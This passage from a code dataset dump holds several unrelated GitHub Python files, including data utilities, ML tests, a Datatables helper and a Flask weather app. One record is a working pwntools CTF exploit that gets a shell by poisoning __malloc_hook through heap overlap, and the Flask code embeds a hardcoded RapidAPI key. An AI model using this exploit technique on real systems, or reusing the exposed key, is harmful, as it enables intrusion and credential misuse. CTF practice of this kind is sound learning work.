in the lambda temporary folder\n df = pandas.DataFrame(result_array)\n insightsDataFileLocation = f\"/tmp/{jobID}-insights.csv\"\n df.to_csv(insightsDataFileLocation)\n return insightsDataFileLocation\n","repo_name":"NaiduVeeraVishnuVardhan/BreastCancerService","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25331205944","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 12 22:09:19 2019\r\n\r\n@author: study\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef readbinFile(filename):\r\n byte_num = 504\r\n interval = 168000\r\n tol = 20\r\n\r\n blk_num = 0\r\n last_timetag = 0\r\n err_flag=False\r\n\r\n with open(filename, \"rb\") as f:\r\n while True:\r\n block=f.read(512)\r\n if not block:\r\n break\r\n else:\r\n blk_num=blk_num+1\r\n count=int.from_bytes(block[0:2], byteorder=\"little\", signed=False)\r\n if count != byte_num:\r\n print(\"Incorrect number of bytes in Block: \", blk_num);\r\n err_flag=True\r\n \r\n overrun=int.from_bytes(block[2:4], byteorder=\"little\", signed=False)\r\n if overrun:\r\n print(\"Overrun error at Block: \", blk_num, overrun)\r\n err_flag=True\r\n \r\n timetag=int.from_bytes(block[4:8], byteorder=\"little\", signed=False)\r\n if blk_num>=2:\r\n time_diff = timetag-last_timetag\r\n if time_diff>(interval+tol) or time_diff<(interval-tol):\r\n print(\"Timetage error in Block: \", blk_num, time_diff)\r\n err_flag=True\r\n \r\n last_timetag = timetag\r\n \r\n # remove the last block\r\n num=blk_num*21\r\n data = np.zeros((num, 12))\r\n n=0\r\n\r\n with open(filename, \"rb\") as f:\r\n while True:\r\n block=f.read(512)\r\n if not block:\r\n break\r\n else:\r\n for k in range(21):\r\n m=8+k*24\r\n for j in range(12):\r\n p=m+j*2\r\n data[n, j]=int.from_bytes(block[p:p+2], byteorder=\"big\", signed=True)\r\n n=n+1\r\n \r\n return err_flag, data\r\n \r\n\r\nerr_flag, sensordata = readbinFile(\"sensor00.bin\") \r\n\r\nnp.savetxt(\"sensor00.txt\", data, fmt='%5d', delimiter=' ') ","repo_name":"TreeKangaroo/imu-gait-analysis","sub_path":"KneeAngle/readbindata.py","file_name":"readbindata.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42540448489","text":"# Imports\nimport os\nimport glob\nimport progressbar\nimport cv2\n\nimport config\n\n\n# Check if the raw_images directory exists\nif not os.path.exists(config.RAW_IMAGES_DIR):\n print(\"Raw images directory: No\")\nelse:\n print(\"Raw images directory: Yes\")\n\n\nif not os.path.exists(config.RESIZED_IMAGES_DIR):\n print(\"Resized images directory: No\")\n os.makedirs(config.RESIZED_IMAGES_DIR)\n print(\"Create resized images directory: Yes\")\n\nelse:\n print(\"Resized images directory: Yes\")\n\n\n# Get the names of all files in the raw_images directory\nfile_names = glob.glob(os.path.join(config.RAW_IMAGES_DIR, \"*.{}\".format(config.IMAGE_EXTENSION)))\nprint(\"Files in raw images directory: {}\".format(len(file_names)))\n\nbar = progressbar.ProgressBar(maxval=len(file_names), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])\nbar.start()\nprint(\"Resizing images:-\")\n\n# Loop through the images and resize the images\nfor i, filename in enumerate(file_names):\n img = cv2.imread(filename)\n img_resized = cv2.resize(img, config.RESIZE_DIMS)\n new_filename = \"{}.{}\".format(str(i), config.IMAGE_EXTENSION )\n new_filepath = os.path.join(config.RESIZED_IMAGES_DIR, new_filename)\n cv2.imwrite(new_filepath, img_resized)\n bar.update(i + 1)\nbar.finish()\n\nprint(\"Saved images to: {}\".format(config.RESIZED_IMAGES_DIR))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nikhilbaby/custom-object-detector","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7434097939","text":"import pandas as pd\nimport numpy as np\n\nclass RandomHotelAllocator:\n def __init__(self, hotelsdata, guestdata, preferencesdata):\n self.hotelsdata = hotelsdata\n self.guestdata = guestdata\n self.preferencesdata = preferencesdata\n self.allocation = pd.DataFrame(columns=['guest_id', 'hotel_id', 'satisfaction_percentage', 'paid_price'])\n\n def calculate_satisfaction_percentage(self, guest_id, hotel_id):\n guest_preferences = self.preferencesdata[self.preferencesdata['guest'] == guest_id].reset_index()\n\n if guest_preferences.empty:\n return 100\n\n is_hotel_one_of_preferred = np.isin(hotel_id, guest_preferences['hotel'].values)\n\n if is_hotel_one_of_preferred.any():\n index_of_preference = np.argmax(guest_preferences['hotel'].values == hotel_id)\n guest_preferences_count = len(guest_preferences)\n return round(((guest_preferences_count - index_of_preference) / guest_preferences_count) * 100)\n else:\n return 0\n\n def allocate_random_hotel(self, guest_id, guest_row):\n available_hotels = self.hotelsdata[self.hotelsdata['rooms'] > 0]\n if available_hotels.empty:\n return None\n\n random_available_hotel_id = np.random.choice(available_hotels.index)\n random_available_hotel_row = available_hotels.loc[random_available_hotel_id]\n random_available_hotel_row['rooms'] -= 1\n\n paid_price_coefficient = 1 - guest_row['discount']\n paid_price = random_available_hotel_row['price'] * paid_price_coefficient\n\n satisfaction = self.calculate_satisfaction_percentage(guest_id, random_available_hotel_id)\n\n return [guest_id, random_available_hotel_id, satisfaction, paid_price]\n\n def get_random_allocation(self):\n shuffled_guests = self.guestdata.sample(frac=1, random_state=42)\n for guest_id, guest_row in shuffled_guests.iterrows():\n allocation_entry = self.allocate_random_hotel(guest_id, guest_row)\n if allocation_entry is not None:\n self.allocation.loc[len(self.allocation)] = allocation_entry\n\n return self.allocation","repo_name":"sergiopicascia/dscoding-projects","sub_path":"Alina.Imansakipova/hotel-project/hotel_project/final/random_allocation_class.py","file_name":"random_allocation_class.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"72638617336","text":"from pwn import *\nfrom LibcSearcher import *\n\nimport utils\n\ncontext.arch = 'amd64'\ncontext.log_level = 'debug'\n\ntarget = remote('node4.buuoj.cn', 26614)\nelf = ELF('../roarctf_2019_easy_pwn')\nlibc = ELF('/home/kali/glibc-all-in-one/libs/2.23-amd64/libc-2.23.so')\n\n\n# Utility functions\ndef allocate(size):\n target.sendlineafter('choice: ', '1')\n target.sendlineafter('size: ', str(size))\n target.recvuntil('the index of ticket is')\n\n\ndef edit(index, size, content):\n target.sendlineafter('choice: ', '2')\n target.sendlineafter('index: ', str(index))\n target.sendlineafter('size: ', str(size))\n target.sendafter('content: ', content)\n\n\ndef free(index):\n target.sendlineafter('choice: ', '3')\n target.sendlineafter('index: ', str(index))\n\ndef show(index):\n target.sendlineafter('choice: ', '4')\n target.sendlineafter('index: ', str(index))\n\n# We know that the size and valid bit are stored in a different location.\n# A global heap array stores the pointer to the heap.\n# Use off-by-one and an irregular heap size, we can modify\n# one byte of the next block.\nallocate(0x18) # 0\nallocate(0x10) # 1\nallocate(0x60) # 2\nallocate(0x60) # 3\n\nedit(0, 0x18 + 10, b'a' * 0x18 + b'\\x91')\nfree(1)\n\n# Chunk split happened here. So fd and bk will be placed= inside chunk 2.\nallocate(0x10) # 1\nshow(2)\n\nmain_arena = u64(target.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - 88\nmalloc_hook = main_arena - 0x10\nlibc_base = malloc_hook - libc.sym['__malloc_hook']\n\nallocate(0x60) # 4 but controls 2 (overlapping chunk).\n\none_gadget = 0x4526a + libc_base\n\nfree(2)\nfree(3)\nfree(4)\n\nallocate(0x60) # 2\nedit(2, 8, p64(libc_base + libc.sym['__malloc_hook'] - 0x23))\nallocate(0x60) # 3\nallocate(0x60) # 4\nallocate(0x60) # 5\n\npayload = b'a' * 0xb + p64(one_gadget) + \\\n p64(libc_base + libc.sym['__realloc_hook'] + 4)\nedit(5, len(payload), payload)\n\nallocate(0x10)\n\ntarget.interactive()\n","repo_name":"hiroki-chen/PWN-scripts","sub_path":"roarctf_2019_easy_pwn.py","file_name":"roarctf_2019_easy_pwn.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23423750977","text":"import torch.nn as nn\nimport torch\n\nclass RMSELoss(nn.Module):\n def __init__(self):\n super().__init__()\n self.mse = nn.MSELoss()\n \n def forward(self,pred,true):\n pred.float()\n true.float()\n return torch.sqrt(self.mse(pred,true)).float()\n\n","repo_name":"gonzo3832/202110_PetFinder","sub_path":"src/criterion.py","file_name":"criterion.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16785291055","text":"import curses\nimport sys\nimport random\nimport time\n\nfrom os import listdir\nfrom os.path import isfile, join\n\nclass FileListing:\n DOWN = 1\n UP = -1\n SPACE_KEY = 32\n ESC_KEY = 27\n\n PREFIX_SELECTED = '[X]'\n PREFIX_DESELECTED = '[_]'\n\n outputLines = []\n screen = None\n\n mypath = \".\"\n\n def __init__(self):\n self.screen = curses.initscr()\n curses.noecho()\n curses.cbreak()\n self.screen.keypad(1)\n self.screen.border(0)\n self.topLineNum = 0\n self.highlightLineNum = 0\n self.markedLineNums = []\n self.getOutputLines()\n (self.maxY, self.maxX) = self.screen.getmaxyx()\n\n def run(self):\n c = \"\"\n while c not in [ord(\"q\"), self.ESC_KEY]:\n self.displayScreen()\n c = self.screen.getch()\n if c == curses.KEY_UP:\n self.updown(self.UP)\n elif c == curses.KEY_DOWN:\n self.updown(self.DOWN)\n elif c == self.SPACE_KEY:\n self.markLine()\n\n return [self.mypath+self.outputLines[i] for i in self.markedLineNums]\n\n def markLine(self):\n linenum = self.topLineNum + self.highlightLineNum\n if linenum in self.markedLineNums:\n self.markedLineNums.remove(linenum)\n else:\n self.markedLineNums.append(linenum)\n\n def getOutputLines(self):\n self.outputLines = [ f for f in listdir(self.mypath) if isfile(join(self.mypath,f)) ]\n self.nOutputLines = len(self.outputLines)\n\n def displayScreen(self):\n # clear screen\n self.screen.clear()\n self.screen.border(0)\n\n # now paint the rows\n top = self.topLineNum\n bottom = self.topLineNum+curses.LINES\n for (index,line,) in enumerate(self.outputLines[top:bottom]):\n linenum = self.topLineNum + index\n if linenum in self.markedLineNums:\n prefix = self.PREFIX_SELECTED\n else:\n prefix = self.PREFIX_DESELECTED\n\n line = '%s %s' % (prefix, line,)\n\n # highlight current line\n if index != self.highlightLineNum:\n self.screen.addstr(index+2, 4, line)\n else:\n self.screen.addstr(index+2, 4, line, curses.A_BOLD)\n\n # Affichage bas de la fenetre\n for u in range(self.maxX):\n if u == 0:\n self.screen.addch(self.maxY - 3, u, curses.ACS_LTEE)\n elif u == self.maxX - 1:\n self.screen.addch(self.maxY - 3, u, curses.ACS_RTEE)\n else:\n self.screen.addch(self.maxY - 3, u, curses.ACS_HLINE)\n self.screen.addstr(self.maxY - 2, 1, '(Esc|q) - Back')\n\n self.screen.refresh()\n\n # move highlight up/down one line\n def updown(self, increment):\n nextLineNum = self.highlightLineNum + increment\n\n # paging\n if increment == self.UP and self.highlightLineNum == 0 and self.topLineNum != 0:\n self.topLineNum += self.UP\n return\n elif increment == self.DOWN and nextLineNum == curses.LINES and (self.topLineNum+curses.LINES) != self.nOutputLines:\n self.topLineNum += self.DOWN\n return\n\n # scroll highlight line\n if increment == self.UP and (self.topLineNum != 0 or self.highlightLineNum != 0):\n self.highlightLineNum = nextLineNum\n elif increment == self.DOWN and (self.topLineNum+self.highlightLineNum+1) != self.nOutputLines and self.highlightLineNum != curses.LINES:\n self.highlightLineNum = nextLineNum\n","repo_name":"c4software/simple_remote_gui","sub_path":"file_listing.py","file_name":"file_listing.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"15810308715","text":"import numpy as np\nimport pytest\nimport paddle.inference\n\nimport bentoml\n\nfrom .test_paddle_impl import test_df\n\n\ndef test_paddlepaddle_load_runner(train_paddle_model):\n tag = bentoml.paddle.save(\"linear_model\", train_paddle_model)\n info = bentoml.models.get(tag)\n runner = bentoml.paddle.load_runner(tag)\n\n assert info.tag in runner.required_models\n assert runner.num_replica == 1\n\n input_data = test_df.to_numpy().astype(np.float32)\n assert runner.run_batch(input_data) == [np.array([0.90038574], dtype=np.float32)]\n assert isinstance(runner._model, paddle.inference.Predictor)\n\n\ndef test_paddlepaddle_runner_from_paddlehub():\n test_text = [\"这家餐厅很好吃\", \"这部电影真的很差劲\"]\n tag = bentoml.paddle.import_from_paddlehub(\"senta_bilstm\")\n runner = bentoml.paddle.load_runner(tag, infer_api_callback=\"sentiment_classify\")\n results = runner.run_batch(None, texts=test_text, use_gpu=False, batch_size=1)\n assert results[0][\"positive_probs\"] == 0.9407\n assert results[1][\"positive_probs\"] == 0.02\n\n\n@pytest.mark.gpus\ndef test_paddlepaddle_load_runner_gpu(train_paddle_model):\n \"\"\"\n tag = bentoml.paddle.save(\"linear_model\", train_paddle_model)\n info = bentoml.models.get(tag)\n runner = bentoml.paddle.load_runner(\n tag,\n enable_gpu=True,\n device=\"gpu:0\",\n )\n\n assert info.tag in runner.required_models\n assert runner.num_replica == bentoml.paddle.device_count()\n\n input_data = test_df.to_numpy().astype(np.float32)\n _ = runner.run_batch(input_data)\n assert isinstance(runner._model, paddle.inference.Predictor)\n assert runner._runner_config.use_gpu() is True\n \"\"\"\n","repo_name":"jung235/BentoML","sub_path":"tests/integration/frameworks/paddle/test_paddle_runner.py","file_name":"test_paddle_runner.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"30072769243","text":"import torch\n\nfrom torch.distributions import Categorical\nfrom torch import nn\nfrom garage.torch.modules import MLPModule\n\nclass CategoricalMLPModule(nn.Module):\n\n def __init__(self,\n input_dim,\n output_dim,\n hidden_sizes=(64, 64),\n hidden_nonlinearity=torch.tanh,\n hidden_w_init=nn.init.xavier_uniform_,\n hidden_b_init=nn.init.zeros_,\n output_w_init=nn.init.xavier_uniform_,\n output_b_init=nn.init.zeros_,\n layer_normalization=False):\n super().__init__()\n\n self._input_dim = input_dim\n self._hidden_sizes = hidden_sizes\n self._action_dim = output_dim\n self._hidden_nonlinearity = hidden_nonlinearity\n self._hidden_w_init = hidden_w_init\n self._hidden_b_init = hidden_b_init\n self._output_w_init = output_w_init\n self._output_b_init = output_b_init\n self._layer_normalization = layer_normalization\n # Set output nonlinearity to none as we need raw preds for St gumbel-softmax estimator\n self._output_nonlinearity = None\n\n self.categorical_logits_module = MLPModule(\n input_dim= self._input_dim,\n output_dim = self._action_dim,\n hidden_sizes=self._hidden_sizes,\n hidden_nonlinearity=self._hidden_nonlinearity,\n hidden_w_init=self._hidden_w_init,\n hidden_b_init=self._hidden_b_init,\n output_nonlinearity=None,\n output_w_init=self._output_w_init,\n output_b_init=self._output_b_init,\n layer_normalization=self._layer_normalization\n )\n\n def forward(self, inputs):\n logits = self.categorical_logits_module(inputs)\n return Categorical(logits=logits)\n","repo_name":"MkuuWaUjinga/DeepMDP-SSL4RL","sub_path":"deepmdp/garage_mod/policies/categorical_mlp_module.py","file_name":"categorical_mlp_module.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"5467683640","text":"# Datatable server side processing\n# @author : Ahmad Fajar\n# support : ordering single or multiple column, searching from specify column\n# minus : searching from all column, regex\n# test commit\n# how to use:\n# first on the client side should be have this 2 params option in your datatables initial script:\n# serverSide : true,\n# columns: [\n# { 'name' : 'dbFieldName/specificKeyFromResponse', 'data' : 'dbFieldName/specificKeyFromResponse/YouCreateCallbackinHere' }\n# ]\n\n# then we create an object from Datatables Class\n# in here we pass all the data from datatables in request.GET then assign that to `attributes` args\n# and the Model Class into `queryset` args like this :\n# DT_Instance = Datatables(attributes=request.GET, queryset=ModelClass)\n\n# then we just call the filter function and get query result like this:\n# datas, records_filtered, records_total = DI_Instance.filter().getQueryset()\n# and then we return the response to client side or we can play with the datas first and then return the response to clien side\n# return JsonResponse({\n# \"draw\": DT_Instance.getDraw(),\n# \"data\" : list(datas.values('columnA', 'columnB', 'etc..')),\n# \"recordsTotal\": records_total,\n# \"recordsFiltered\": records_filtered\n# }, safe=False)\n\n\n# important NOTE :\n# the default filter condition is just like this `column=value`\n# so if we have a special condition like `column__lte` or etc,\n# we can create a function to filter with condition what we want like this:\n# in this case we want to filter the date data by month and day\n# def monthday_filter(value, column='')\n# mn, day = value.split('-')\n# NOTE : the return function should be Boolean False or array 2 dimension `[[condition, value], etc...]`\n# if we return False the custom function will not be executed\n# return [['%s__month'%(column), mn], ['%s__day'%(column), day]]\n\n# then we assign the function into custom_condition args and we can also add an extra filter in filter function like this\n# custom_condition = { 'nametheDateField' : monthday_filter }\n# DT_Instance.filter(filters={'a' : 'a', 'b' :'b'}, custom_condition=custom_condition)\n#\n# then we get the query result with data that already filtered by condition what we want from datatables and what we do previously\n# datas, records_filtered, records_total = DI_Instance.getQueryset()\n\nclass Datatables():\n # attributes format from datatables will be like this:\n # {\n # 'draw': [''],\n # 'columns[0-n][data]': ['0'],\n # 'columns[0-n][name]': [''],\n # 'columns[0-n][searchable]': ['true' or 'false'],\n # 'columns[0-n][orderable]': ['true' or 'false'],\n # 'columns[0-n][search][value]': [''],\n # 'columns[0-n][search][regex]': ['true' or 'false']\n # 'order[0][column]': ['2'],\n # 'order[0][dir]': ['desc'],\n # 'start': ['0'],\n # 'length': ['100'],\n # 'search[value]': [''],\n # 'search[regex]': ['false']\n # }\n # we get raw attributes from request.GET\n rawAttributes = {}\n\n # we want the attribute from datatables more readable\n cleanAttributes = {'columns' : [], 'order' : [], 'start' : 0, 'length' : 10, 'search' : {'value' : '', 'regex' : 'false'}}\n\n # direction ordering\n direction_order = {\n 'desc' : '-',\n 'asc' : ''\n }\n\n # data from database\n queryset = None\n\n def __init__(self, attributes={}, queryset=None):\n # we pass request.GET to rawAttributes\n self.rawAttributes = attributes\n # queryset is the model object\n self.queryset = queryset\n\n # we normalize the attributes first\n if queryset:\n self.normalizeAttributes()\n\n def normalizeAttributes(self):\n # reset order and columns\n self.cleanAttributes['order'] = []\n self.cleanAttributes['columns'] = []\n\n i = 0\n loop = True\n while loop:\n # first we normalize each column attributes\n try:\n name = self.rawAttributes['columns[%d][name]'%(i)]\n data = {\n 'data' : self.rawAttributes['columns[%d][data]'%(i)],\n 'name' : name,\n 'searchable' : self.rawAttributes['columns[%d][searchable]'%(i)],\n 'orderable' : self.rawAttributes['columns[%d][orderable]'%(i)],\n 'search' : {\n 'value' : self.rawAttributes['columns[%d][search][value]'%(i)],\n 'regex' : self.rawAttributes['columns[%d][search][regex]'%(i)]\n }\n }\n self.cleanAttributes['columns'].append(data)\n i+=1\n except Exception as e:\n loop = False\n\n i = 0\n loop = True\n while loop:\n # normalize order\n try:\n self.cleanAttributes['order'].append({\n 'column' : self.rawAttributes['order[%d][column]'%(i)],\n 'dir' : self.rawAttributes['order[%d][dir]'%(i)]\n })\n i+=1\n except Exception as e:\n loop = False\n\n # normalize all global attributes\n self.cleanAttributes['start'] = int(self.rawAttributes['start'])\n self.cleanAttributes['draw'] = self.rawAttributes['draw']\n self.cleanAttributes['length'] = int(self.rawAttributes['length'])\n self.cleanAttributes['search']['value'] = self.rawAttributes['search[value]']\n self.cleanAttributes['search']['regex'] = self.rawAttributes['search[regex]']\n\n def globalFilter(self, filters, custom_orders, q_filters):\n order_by = []\n # order by\n for order in self.cleanAttributes['order']:\n column = self.cleanAttributes['columns'][int(order['column'])]['name']\n try:\n # we can create a custom function for ordering with any condition what we want\n columns = custom_orders[column]()\n if columns:\n for ccolumn in columns:\n ccolumn = self.direction_order[order['dir']] + ccolumn\n order_by.append(ccolumn)\n except Exception as e:\n column = self.direction_order[order['dir']] + column\n if column not in order_by:\n order_by.append(column)\n\n self.queryset = self.queryset.objects.order_by(*order_by).filter(**filters)\n\n if q_filters and self.cleanAttributes['search']['value'] != '':\n self.queryset = self.queryset.filter(q_filters(self.cleanAttributes['search']['value']))\n\n return self\n\n def filters(self, custom_condition={}, filters={}, custom_orders={}, globalSearch=False, q_filters=None):\n if globalSearch:\n return self.globalFilter(filters, custom_orders, q_filters)\n\n order_by = []\n # search\n for column in self.cleanAttributes['columns']:\n if column['search']['value'] != '':\n value = column['search']['value']\n\n # default condition just a name of field\n condition = column['name']\n try:\n # we can create a custom function for filter with any condition what we want\n conditions = custom_condition[condition](value=value, column=condition)\n if conditions:\n for cn, val in conditions:\n filters[cn] = None if val == 'null' else val\n\n except Exception as e:\n filters[condition] = None if value == 'null' else value\n\n # order by\n for order in self.cleanAttributes['order']:\n column = self.cleanAttributes['columns'][int(order['column'])]['name']\n try:\n # we can create a custom function for ordering with any condition what we want\n columns = custom_orders[column]()\n if columns:\n for ccolumn in columns:\n ccolumn = self.direction_order[order['dir']] + ccolumn\n order_by.append(ccolumn)\n except Exception as e:\n column = self.direction_order[order['dir']] + column\n if column not in order_by:\n order_by.append(column)\n\n self.queryset = self.queryset.objects.order_by(*order_by).filter(**filters)\n\n return self\n\n def exclude(self, **filters):\n self.queryset = self.queryset.exclude(**filters)\n return self\n\n # setter getter\n def getQueryset(self, full=False):\n querysetByRange = None\n try:\n querysetByRange = self.queryset[self.getStart():self.getEnd()]\n except Exception as e:\n pass\n if not full:\n return [querysetByRange, self.queryset.count(), len(querysetByRange)]\n else:\n return [self.queryset, self.queryset.count()]\n\n def getAttributes(self, attribute=None):\n if attribute:\n attribute = self.cleanAttributes[attribute]\n else:\n attribute = self.cleanAttributes\n\n return attribute\n\n def getLength(self):\n return self.cleanAttributes['length']\n\n def getDraw(self):\n return self.cleanAttributes['draw']\n\n def getStart(self):\n return self.cleanAttributes['start']\n\n def getEnd(self):\n return self.cleanAttributes['start'] + self.cleanAttributes['length']\n\n def getOrders(self):\n order_by = []\n self.normalizeAttributes()\n for order in self.cleanAttributes['order']:\n column = self.cleanAttributes['columns'][int(order['column'])]['name']\n column = self.direction_order[order['dir']] + column\n if column not in order_by:\n order_by.append(column)\n\n return order_by\n\n def getFilters(self):\n order_by = []\n self.normalizeAttributes()\n filters = {}\n # search\n for column in self.cleanAttributes['columns']:\n if column['search']['value'] != '':\n value = column['search']['value']\n\n # default condition just a name of field\n condition = column['name']\n try:\n # we can create a custom function for filter with any condition what we want\n conditions = custom_condition[condition](value=value, column=condition)\n if conditions:\n for cn, val in conditions:\n filters[cn] = None if val == 'null' else val\n\n except Exception as e:\n filters[condition] = None if value == 'null' else value\n\n return filters\n","repo_name":"ahmadfajar92/Django-Datatables-Projects","sub_path":"source/datatables.py","file_name":"datatables.py","file_ext":"py","file_size_in_byte":10724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12366153764","text":"\"\"\"\nНапишите программу, которая на вход принимает два числа A и B,\nи возводит число А в целую степень B с помощью рекурсии.\n\"\"\"\n\ndef power_recursive(A, B):\n # Базовый случай: если степень равна 0, то результат всегда равен 1.\n if B == 0:\n return 1\n\n # Рекурсивный случай: уменьшаем степень на 1 и рекурсивно вызываем функцию.\n # Затем умножаем результат на A.\n result = A * power_recursive(A, B - 1)\n print(f'{A} в степени {B} равно {result}')\n return result\n\npower_recursive(4,6)","repo_name":"LDimak/PythonHomeWorks","sub_path":"HW05/Task01.py","file_name":"Task01.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28833540120","text":"from _tools import *\nfrom collections import OrderedDict\n\nFIELDS_UI = OrderedDict()\n\n#------------------------------------------------------------------------\n# CONFIGURATION SECTION \nAPP_NAME = 'Reachability'\n\n# Variable names when displayed on the user interface\n# Create this dictionary in the same order that you want to display it\nFIELDS_UI = OrderedDict()\n#FIELDS_UI['Speed_Approach'] = 'Approach speed (mm/s)'\n#FIELDS_UI['Speed_Normal'] = 'Operation Speed (mm/s)'\nFIELDS_UI['ShowRobotPoses'] = 'Show Robot'\nFIELDS_UI['Unreachable_Timeout'] = 'Unreachable timeout (s)'\nFIELDS_UI['Range_TX'] = 'Translation X (m)'\nFIELDS_UI['Range_TY'] = 'Translation Y (m)'\nFIELDS_UI['Range_TZ'] = 'Translation Z (m)'\nFIELDS_UI['Range_RX'] = 'Rotation X (deg)'\nFIELDS_UI['Range_RY'] = 'Rotation Y (deg)'\nFIELDS_UI['Range_RZ'] = 'Rotation Z (deg)'\n\n\n# Station name to store\nSTATIONVAR_NAME = APP_NAME \n\nclass Settings(AppSettings):\n \"\"\"Generic settings class to save and load settings from a RoboDK station and show methods in RoboDK\"\"\"\n # List the variable names you would like to save and their default values\n # Important: Try to avoid default None type!! \n # If None is used as default value it will attempt to treat it as a float and None = -1 \n # Variables that start with underscore (_) will not be saved\n #Speed_Approach = 200\n #Speed_Normal = 50 \n ShowRobotPoses = False\n Unreachable_Timeout = 2\n Range_TX = \"[0]\"\n Range_TY = \"[0]\"\n Range_TZ = \"[0]\"\n Range_RX = \"range(-120, 180, 60)\"\n Range_RY = \"range(-120, 180, 60)\"\n Range_RZ = \"[0]\" \n \n \n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------\n#------------------------------------------------------------------------ \n def __init__(self):\n # customize the initialization section if needed\n super(Settings, self).__init__(STATIONVAR_NAME)\n self._FIELDS_UI = FIELDS_UI\n\n def CopyFrom(self, other):\n \"\"\"Copy settings from another instance\"\"\"\n attr = self.getAttribs()\n for a in attr:\n if hasattr(other, a):\n setattr(self,a, getattr(other, a))\n\n def SetDefaults(self):\n # List untouched variables for default settings\n list_untouched = []\n \n # save in local variables\n for var in list_untouched:\n exec('%s=self.%s' % (var,var))\n\n defaults = Settings()\n self.CopyFrom(defaults)\n\n # restore from local vars\n for var in list_untouched:\n exec('self.%s=%s' % (var,var))\n\n def ShowUI(self, windowtitle=APP_NAME, embed=False, wparent=None, callback_frame=None):\n # Show the UI for these settings including a custom frame to set the default settings\n def custom_frame(w):\n def set_defaults():\n w.destroy()\n self.SetDefaults()\n self.ShowUI(windowtitle=windowtitle, embed=embed, wparent=wparent, callback_frame=custom_frame)\n\n row = tk.Frame(w)\n b1 = tk.Button(row, text='Set defaults', command=set_defaults, width=8)\n b1.pack(side=tk.LEFT, padx=5, pady=5)\n\n #Creating the OK button\n #bhelper = tk.Button(row, text='OK', command=read_fields, width=8)\n #bhelper.pack(side=tk.RIGHT, padx=5, pady=5)\n\n row.pack(side=tk.TOP, fill=tk.X, padx=1, pady=1)\n\n super(Settings, self).ShowUI(windowtitle=windowtitle, embed=embed, wparent=wparent, callback_frame=custom_frame)\n\n\ndef runmain():\n # Read this app settings\n S = Settings()\n\n #if not S.Load():\n # print(\"Using default settings (loaded for the first time)\")\n \n S.Load()\n S.ShowUI()\n S.Save() \n \nif __name__ == \"__main__\":\n runmain()\n","repo_name":"terragord7/Plug-In-Interface","sub_path":"PluginAppLoader/Apps/Reachability/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"73969702447","text":"from flask import Blueprint, render_template, request\nimport json\nimport requests\n\n\nviews = Blueprint('views', __name__)\n\n\n\n\n@views.route('/', methods=['GET'])\ndef home():\n return render_template(\"home.html\")\n\n\n@views.route('/predict_weather', methods=['POST', 'GET'])\ndef predict_weather():\n if request.method == 'POST':\n q = request.form['location']\n\n url = \"https://weatherapi-com.p.rapidapi.com/current.json\"\n\n querystring = {\"q\": q}\n\n headers = {\n \"X-RapidAPI-Key\": \"f2ff04fdf0mshaa1fd82cd7eaeadp1c25e9jsn17abd8162778\",\n \"X-RapidAPI-Host\": \"weatherapi-com.p.rapidapi.com\"\n }\n\n\n try:\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n json_data = json.loads(response.text)\n\n name = json_data['location']['name']\n region = json_data['location']['region']\n country = json_data['location']['country']\n lat = json_data['location']['lat']\n lon = json_data['location']['lon']\n tz_id = json_data['location']['tz_id']\n localtime_epoch = json_data['location']['localtime_epoch']\n localtime = json_data['location']['localtime']\n last_updated_epoch = json_data['current']['last_updated_epoch']\n last_updated = json_data['current']['last_updated']\n temp_c = json_data['current']['temp_c']\n temp_f = json_data['current']['temp_f']\n is_day = json_data['current']['is_day']\n condition_text = json_data['current']['condition']['text']\n condition_icon = json_data['current']['condition']['icon']\n wind_mph = json_data['current']['wind_mph']\n wind_kph = json_data['current']['wind_kph']\n wind_degree = json_data['current']['wind_degree']\n wind_dir = json_data['current']['wind_dir']\n pressure_mb = json_data['current']['pressure_mb']\n pressure_in = json_data['current']['pressure_in']\n precip_mm = json_data['current']['precip_mm']\n precip_in = json_data['current']['precip_in']\n humidity = json_data['current']['humidity']\n cloud = json_data['current']['cloud']\n feelslike_c = json_data['current']['feelslike_c']\n feelslike_f = json_data['current']['feelslike_f']\n vis_km = json_data['current']['vis_km']\n vis_miles = json_data['current']['vis_miles']\n uv = json_data['current']['uv']\n gust_mph = json_data['current']['gust_mph']\n gust_kph = json_data['current']['gust_kph']\n return render_template('home.html', name=name, region=region, country=country, lat=lat, lon=lon,\n tz_id=tz_id,\n localtime_epoch=localtime_epoch, 